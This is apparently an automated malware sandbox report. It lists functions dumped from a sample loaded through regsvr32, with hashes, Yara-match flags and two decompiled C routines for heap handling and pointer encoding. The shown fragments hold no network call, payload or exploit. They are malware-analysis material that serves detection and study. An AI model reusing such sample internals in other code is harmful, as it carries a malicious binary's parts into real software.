                                                                                                                                                                                                                    • Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                                    • Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025996D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: u*AR
                                                                                                                                                                                                                    • API String ID: 0-611844632
                                                                                                                                                                                                                    • Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                                    • Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258DBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: g*`
                                                                                                                                                                                                                    • API String ID: 0-1142845859
                                                                                                                                                                                                                    • Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                                    • Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025892F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 5$
                                                                                                                                                                                                                    • API String ID: 0-3756733592
                                                                                                                                                                                                                    • Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                                    • Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259A6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: n*=
                                                                                                                                                                                                                    • API String ID: 0-1578461029
                                                                                                                                                                                                                    • Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                                    • Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                                                                                                                                    0x18000a87c
                                                                                                                                                                                                                    0x18000a885
                                                                                                                                                                                                                    0x18000a893

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                    • Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                                    • Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258B258 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                                                                                                                                    • Instruction ID: fd03a9ccdbc240c4fe91cb72976b92223db3b6c38241340075cd8ce41bd8bff7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E10570E0460ACFDF58DFA8C49A9AEBBF6FB44348F404159D806E72A0D7B49615CBC9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02581000 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                                                                                                                                    • Instruction ID: 9e2f66d762a8f9271e9e1021d88570480a43e1ecfc6f317c602a023b722d9ecf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12C1CEB9903609CFDF68CF38C49A59D3BF1EF64308F204119EC269A2A6D774D529CB48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259020C Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                                                                                                                                    • Instruction ID: 059c2644031c89d9a938985125d61e0bafcffe6b220e6405436cfaaac303a089
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFB1F971E04B489FDFA8DFA8D48A5DEBBF2FB44344F00451DD846A7290D7B8941ACB89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258BA2C Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                                                                                                                                    • Instruction ID: 58667ec60314499f548529831c05cc29d76b887284435d4d2cc1cff9a2c45104
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AB108706087C88FDBBEDF24C8892DB3BA9FB45708F504219E9CA8E254DBB45744CB02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259D770 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                                                                                                                                    • Instruction ID: fe196128db0418295a1805fbeaa45a2cecc680897f76576e2e9c230949da76ec
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A814970D08709EFCB58DFA8C49599EBBF1FB44344F00856EE849EB290DB749A09CB85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A27EC Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                                                                                                                                    • Instruction ID: ff3c8d66a7abc00bddb91c9cf930f60c122b683d748053a733871eff5d83bbc4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C8106715107499BDF88CF28C8CA9DD7FB1FB483A8FA56218FC0AA6254D774D485CB84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02583ABC Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                                                                                                                                    • Instruction ID: 4b67ef7c2d8463f93cb8869a5d5f7cb9815fa961807b3da8d2a67d5f2e08c347
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC61207061464D8BDF28EF78D4962AD3BE1FB44308F20613DEC669B2A2D774D506CB44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259E310 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                                                                                                                                    • Instruction ID: ef2f2e5febab0a782468f702fbeae90f29690ebd34ddef687534bb6d6ac51868
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78710770508789CBDBF9CF24C8896DE7BE4FB88704F20461DE9998B2A0DB749685CF41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180007110 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                                    • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02582C78 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                                    • Instruction ID: da9e4722001f176adfd1da1cd8882138b9c74fbb08cc83eaabd1f8187b8986a3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E51E570518788CBDBBADF34C8992D97BB1FB58304F90861DD84E8E290DBB8574ACB45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180006818 Relevance: .1, Instructions: 126COMMONLIBRARYCODECrypto
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                                                                                    			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0xaaf8a09cc6d2
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0xaaf8a09cc6d2
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0xaaf8a09cc6d2
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0xaaf8a09cc6d2
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0xaaf8a09cc6d2
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}
























                                                                                                                                                                                                                    0x180006818
                                                                                                                                                                                                                    0x180006818
                                                                                                                                                                                                                    0x180006818
                                                                                                                                                                                                                    0x18000681d
                                                                                                                                                                                                                    0x180006822
                                                                                                                                                                                                                    0x180006830
                                                                                                                                                                                                                    0x180006835
                                                                                                                                                                                                                    0x180006838
                                                                                                                                                                                                                    0x18000683e
                                                                                                                                                                                                                    0x180006844
                                                                                                                                                                                                                    0x180006851
                                                                                                                                                                                                                    0x18000685a
                                                                                                                                                                                                                    0x180006864
                                                                                                                                                                                                                    0x180006868
                                                                                                                                                                                                                    0x18000686b
                                                                                                                                                                                                                    0x180006871
                                                                                                                                                                                                                    0x18000687f
                                                                                                                                                                                                                    0x180006889
                                                                                                                                                                                                                    0x18000688d
                                                                                                                                                                                                                    0x180006890
                                                                                                                                                                                                                    0x180006893
                                                                                                                                                                                                                    0x18000689a
                                                                                                                                                                                                                    0x18000689c
                                                                                                                                                                                                                    0x18000689c
                                                                                                                                                                                                                    0x1800068a6
                                                                                                                                                                                                                    0x1800068b0
                                                                                                                                                                                                                    0x1800068b8
                                                                                                                                                                                                                    0x1800068ba
                                                                                                                                                                                                                    0x1800068be
                                                                                                                                                                                                                    0x1800068ca
                                                                                                                                                                                                                    0x1800068d1
                                                                                                                                                                                                                    0x1800068d4
                                                                                                                                                                                                                    0x1800068dc
                                                                                                                                                                                                                    0x1800068e9
                                                                                                                                                                                                                    0x1800068ed
                                                                                                                                                                                                                    0x180006905
                                                                                                                                                                                                                    0x180006909
                                                                                                                                                                                                                    0x18000690c
                                                                                                                                                                                                                    0x180006914
                                                                                                                                                                                                                    0x180006917
                                                                                                                                                                                                                    0x18000691e
                                                                                                                                                                                                                    0x18000693d
                                                                                                                                                                                                                    0x180006943
                                                                                                                                                                                                                    0x180006946
                                                                                                                                                                                                                    0x180006959
                                                                                                                                                                                                                    0x180006962
                                                                                                                                                                                                                    0x180006968
                                                                                                                                                                                                                    0x180006979
                                                                                                                                                                                                                    0x180006982
                                                                                                                                                                                                                    0x180006986
                                                                                                                                                                                                                    0x180006992
                                                                                                                                                                                                                    0x18000699b
                                                                                                                                                                                                                    0x1800069a6
                                                                                                                                                                                                                    0x1800069aa
                                                                                                                                                                                                                    0x1800069c7

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                    • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                                    • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

